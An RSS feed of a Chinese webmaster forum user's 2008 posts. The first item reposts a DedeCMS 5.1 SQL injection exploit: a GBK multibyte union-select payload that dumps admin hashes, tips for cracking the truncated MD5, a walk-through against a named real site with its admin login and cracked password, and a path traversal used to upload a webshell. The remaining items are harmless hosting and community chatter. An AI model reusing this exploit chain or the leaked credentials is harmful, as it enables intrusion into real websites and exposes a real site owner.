<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="/xslt/rss2.xsl" media="screen"?>
<rss version="2.0"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Latest from 飞腿站长站: tnrain</title>
		<link>http://www.feitui.com/u/tnrain</link>
		<description>这是一个站长建站交流和共享的地方</description>
		<category>Technology</category>
		<language>zh_cn</language>
		<item>
			<title>dedecms搜索型注入0day (2008.11.09) ... no reply</title>
			<link>http://www.feitui.com/topic/view/405.html</link>
			<comments>http://www.feitui.com/topic/view/405.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>Dedecms</category>
			<description>
			dedecms GBK 5.1 搜索型注射0day&lt;br /&gt;
&lt;br /&gt;
以下内容转载：&lt;br /&gt;
&lt;br /&gt;
大家好，期待已久。今天给大家带来新的0day了&lt;img src="/img/icons/silk/emoticon_happy.png" align="absmiddle" style="padding: 0px 2px 0px 2px;" border="0" /&gt;&lt;br /&gt;
这个oday是有我老师CHAR发现的，因为工作关系不方便做动画，今天由我来给大家演示&lt;br /&gt;
&lt;br /&gt;
漏洞成因:&lt;br /&gt;
$q = trim($q);&lt;br /&gt;
if($areaid &amp;gt; 0) {&lt;br /&gt;
    $wheresql = "areaid=$areaid and ";&lt;br /&gt;
                }&lt;br /&gt;
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";&lt;br /&gt;
获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
废话不多说大家看操作&lt;br /&gt;
&lt;br /&gt;
其他的自己下去研究楼&lt;br /&gt;
&lt;br /&gt;
利用地址:&lt;br /&gt;
plus/infosearch.php?action=search&amp;q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*&lt;br /&gt;
&lt;br /&gt;
补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,注意：&lt;br /&gt;
我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了. &lt;br /&gt;
24-8=16&lt;img src="/img/icons/silk/emoticon_happy.png" align="absmiddle" style="padding: 0px 2px 0px 2px;" border="0" /&gt;&lt;br /&gt;
&lt;br /&gt;
详细了解可到我们学校的网站：&lt;br /&gt;
http://www.yhsafe.com&lt;br /&gt;
http://www.yhsafe.com/announce/2008/1108/article_46.html&lt;br /&gt;
演示网站：http://www.oiole.com/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
dede/file_manage_main.php?activepath=/../&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
直接在网站地址后面加上利用地址就OK&lt;br /&gt;
http://www.oiole.com/plus/infosearch.php?action=search&amp;q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*&lt;br /&gt;
&lt;br /&gt;
忽忽，很激动吧，别急&lt;br /&gt;
账号：admin密码：f6e75e3832e763b6 &lt;br /&gt;
密码是24位哦&lt;br /&gt;
呵呵24-8=16&lt;br /&gt;
常识&lt;img src="/img/icons/silk/emoticon_happy.png" align="absmiddle" style="padding: 0px 2px 0px 2px;" border="0" /&gt;&lt;br /&gt;
猜出来了密码是：sina.com &lt;br /&gt;
默认的dedecms后台都是dede目录下的，我们来看看&lt;br /&gt;
后台地址：http://www.oiole.com/dede/login.php?gotopage=%2Fdede%2Findex.php&lt;br /&gt;
成功登录，正在转向管理管理主页！&lt;br /&gt;
进入后台怎么拿SHELL那？&lt;br /&gt;
？？？？？&lt;br /&gt;
貌似fckeditor编辑器哦&lt;br /&gt;
废话少说&lt;br /&gt;
看这里了dede/file_manage_main.php?activepath=/../&lt;br /&gt;
直接加到网站后面&lt;br /&gt;
http://www.oiole.com/dede/file_manage_main.php?activepath=/../&lt;br /&gt;
最下面新建文件&lt;br /&gt;
压得操作块了&lt;br /&gt;
（空白表示根目录 ，不允许用 “..” 形式的路径）&lt;br /&gt;
表示，我们加的文件在根目录下的&lt;br /&gt;
test.asp我们打开看看&lt;br /&gt;
哦yes上去了&lt;br /&gt;
动画就到这里吧&lt;br /&gt;
&lt;br /&gt;
&lt;a class="tpc" href="http://www.yhsafe.com/demo/2008/1109/down_609.html "&gt;http://www.yhsafe.com/demo/2008/1109/down_609.html &lt;/a&gt;
			</description>
			<pubDate>Sun, 09 Nov 2008 15:18:50 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/405.html</guid>
		</item>
		<item>
			<title>FTP服务器软件除了serv-u还有什么呢？ ... 1 reply</title>
			<link>http://www.feitui.com/topic/view/385.html</link>
			<comments>http://www.feitui.com/topic/view/385.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>主机</category>
			<description>
			vps上全都装serv-u了 全冲突了！&lt;br /&gt;
&lt;br /&gt;
有没有其他的工具 可以代替它？&lt;br /&gt;
&lt;br /&gt;
IIS上那个ftp么？&lt;br /&gt;
还没用过它类 呵呵
			</description>
			<pubDate>Mon, 13 Oct 2008 05:55:31 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/385.html</guid>
		</item>
		<item>
			<title>yeswan的网页游戏 用discuz来推广 真是强！ ... 2 replies</title>
			<link>http://www.feitui.com/topic/view/384.html</link>
			<comments>http://www.feitui.com/topic/view/384.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>俱乐部</category>
			<description>
			看yeswan的论坛 一天暴涨 几千人 在线&lt;br /&gt;
&lt;br /&gt;
全是用DZ的 论坛带过去的 效果真是不一般!
			</description>
			<pubDate>Sun, 12 Oct 2008 15:47:45 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/384.html</guid>
		</item>
		<item>
			<title>局域网 用wifi的话 能映射到内网机器 做web不？ ... 2 replies</title>
			<link>http://www.feitui.com/topic/view/383.html</link>
			<comments>http://www.feitui.com/topic/view/383.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>俱乐部</category>
			<description>
			楼下来？ 哈哈
			</description>
			<pubDate>Sat, 11 Oct 2008 15:20:36 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/383.html</guid>
		</item>
		<item>
			<title>Dreamhost里好象加入了Google mail? ... no reply</title>
			<link>http://www.feitui.com/topic/view/249.html</link>
			<comments>http://www.feitui.com/topic/view/249.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>DreamHost</category>
			<description>
			新开站点时候 新加了Google mail选项, 可以免费使用google的企业邮局了?
			</description>
			<pubDate>Wed, 23 Apr 2008 09:47:19 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/249.html</guid>
		</item>
		<item>
			<title>dreamhost怎么在线解压缩 ... 1 reply</title>
			<link>http://www.feitui.com/topic/view/224.html</link>
			<comments>http://www.feitui.com/topic/view/224.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>DreamHost</category>
			<description>
			dreamhost怎么在线解压缩，看到个说 要用个压缩工具&lt;br /&gt;
&lt;br /&gt;
下下来拉 不知道怎么用。。。
			</description>
			<pubDate>Wed, 09 Apr 2008 22:47:50 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/224.html</guid>
		</item>
		<item>
			<title>今天信箱收到一封骂景安的信 ... 5 replies</title>
			<link>http://www.feitui.com/topic/view/191.html</link>
			<comments>http://www.feitui.com/topic/view/191.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>河南站长</category>
			<description>
			尊敬的业界同行：&lt;br /&gt;
&lt;br /&gt;
在互联网发展迅猛的今天，我公司及众多网络服务业界同行一起，努力改善产品和服务，为客户满意这个目标而奋斗。&lt;br /&gt;
&lt;br /&gt;
但郑州景安机房，无视国家法律，无视商业道德，置公理于不顾，擅自剥夺侵占客户利益。先后曾无理对我公司托管的服务器断网，拒绝道歉和赔偿，我公司被迫终止托管服务器后，无理侵占我公司业务款，并拒绝一切渠道的协商。&lt;br /&gt;
&lt;br /&gt;
对此，我公司忍无可忍，将郑州景安机房的行径公诸于众，求助于业界同行。与郑州景安机房的相关资料，及事件进展，都将发布在专题站“断网”，网址是：&lt;br /&gt;
&lt;br /&gt;
http://www。duanwang。org&lt;br /&gt;
&lt;br /&gt;
欢迎广大同行访问和指教。&lt;br /&gt;
&lt;br /&gt;
谢谢！&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
山东滨州泽星互联网络技术有限公司&lt;br /&gt;
2008-2-29
			</description>
			<pubDate>Sat, 01 Mar 2008 01:01:51 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/191.html</guid>
		</item>
		<item>
			<title>百度联盟  哎~~~ ... 1 reply</title>
			<link>http://www.feitui.com/topic/view/182.html</link>
			<comments>http://www.feitui.com/topic/view/182.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>百度联盟</category>
			<description>
			百度联盟也把我K了。。。&lt;br /&gt;
&lt;br /&gt;
郁闷。。。
			</description>
			<pubDate>Tue, 26 Feb 2008 15:32:30 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/182.html</guid>
		</item>
		<item>
			<title>PR更新了 哈哈 ... 3 replies</title>
			<link>http://www.feitui.com/topic/view/58.html</link>
			<comments>http://www.feitui.com/topic/view/58.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>俱乐部</category>
			<description>
			有小变化 不太激动
			</description>
			<pubDate>Sat, 12 Jan 2008 10:28:12 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/58.html</guid>
		</item>
		<item>
			<title>做系统时候一进ghost就死机 ... no reply</title>
			<link>http://www.feitui.com/topic/view/43.html</link>
			<comments>http://www.feitui.com/topic/view/43.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>自言自语</category>
			<description>
			哎  疯了 以前还不是这样了
			</description>
			<pubDate>Sun, 06 Jan 2008 13:55:37 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/43.html</guid>
		</item>
		<item>
			<title>2008年1月12日IT草根聚首在上海 ... 3 replies</title>
			<link>http://www.feitui.com/topic/view/32.html</link>
			<comments>http://www.feitui.com/topic/view/32.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>上海站长</category>
			<description>
			聚会时间：2008年1月12日 13：00&lt;br /&gt;
聚会地点：上海市宛平宾馆三楼 （上海市徐汇区宛平路315号）&lt;br /&gt;
参会人数：&amp;gt; 500人&lt;br /&gt;
参会费用：免费&lt;br /&gt;
媒体宣传：《新闻晨报》、《青年报》、《计算机世界》、《IT时代周刊》、《中国计算机报》、《IT时报》、上海电视台财经频道、新浪网、网易、搜狐……&lt;br /&gt;
&lt;br /&gt;
嘉宾邀请人：王晨昀（更多嘉宾邀请中，欢迎自荐或推荐嘉宾 wangchenyun@126.com ）&lt;br /&gt;
&lt;br /&gt;
已邀请的嘉宾（排名不分先后）：&lt;br /&gt;
&lt;br /&gt;
王志东 点击科技 总经理&lt;br /&gt;
张涛 大众点评网 总经理&lt;br /&gt;
杨伟庆 艾瑞咨询 总经理&lt;br /&gt;
蒋明亮 华宏伟、上海5G&lt;br /&gt;
庞升东 51.com总经理&lt;br /&gt;
王建硕 客齐集 总经理&lt;br /&gt;
达贝妮 Pcpie视频搜索 总经理&lt;br /&gt;
关国光 快钱 总经理&lt;br /&gt;
张国华 篱笆网（无忧团购网）总经理&lt;br /&gt;
戴志康 康盛创想首席执行官&lt;br /&gt;
图王 站长网 创办人&lt;br /&gt;
李寻欢 榕树下总经理&lt;br /&gt;
许广彬 蓝芒科技 总经理&lt;br /&gt;
刘小光 上海火速 总经理&lt;br /&gt;
董勤峰 落伍者网 站长&lt;br /&gt;
陈曦 《创智赢家》 冠军&lt;br /&gt;
华军 华军软件园 站长&lt;br /&gt;
李钟伟 Pchome.net 创办人，现上海商派总经理&lt;br /&gt;
裴大鹏 Shopex总经理（上海商派）&lt;br /&gt;
刘润 央视国际大型公益“慈善1+1”&lt;br /&gt;
黄一孟、戴云杰  VERYCD 站长&lt;br /&gt;
&lt;br /&gt;
更多嘉宾邀请中……
			</description>
			<pubDate>Fri, 04 Jan 2008 16:49:52 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/32.html</guid>
		</item>
		<item>
			<title>河南类 来拉 哈哈 ... 1 reply</title>
			<link>http://www.feitui.com/topic/view/1.html</link>
			<comments>http://www.feitui.com/topic/view/1.html#reply</comments>
			<dc:creator>tnrain</dc:creator>
			<author>tnrain</author>
			<!--<enclosure url="http://www.feitui.com/img/p/2.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_s.jpg" type="image/jpeg" />
			<enclosure url="http://www.feitui.com/img/p/2_n.jpg" type="image/jpeg" />-->
			<category>河南站长</category>
			<description>
			HOHO` No.1！
			</description>
			<pubDate>Fri, 28 Dec 2007 17:02:22 +0800</pubDate>
			<guid>http://www.feitui.com/topic/view/1.html</guid>
		</item>
	</channel>
</rss>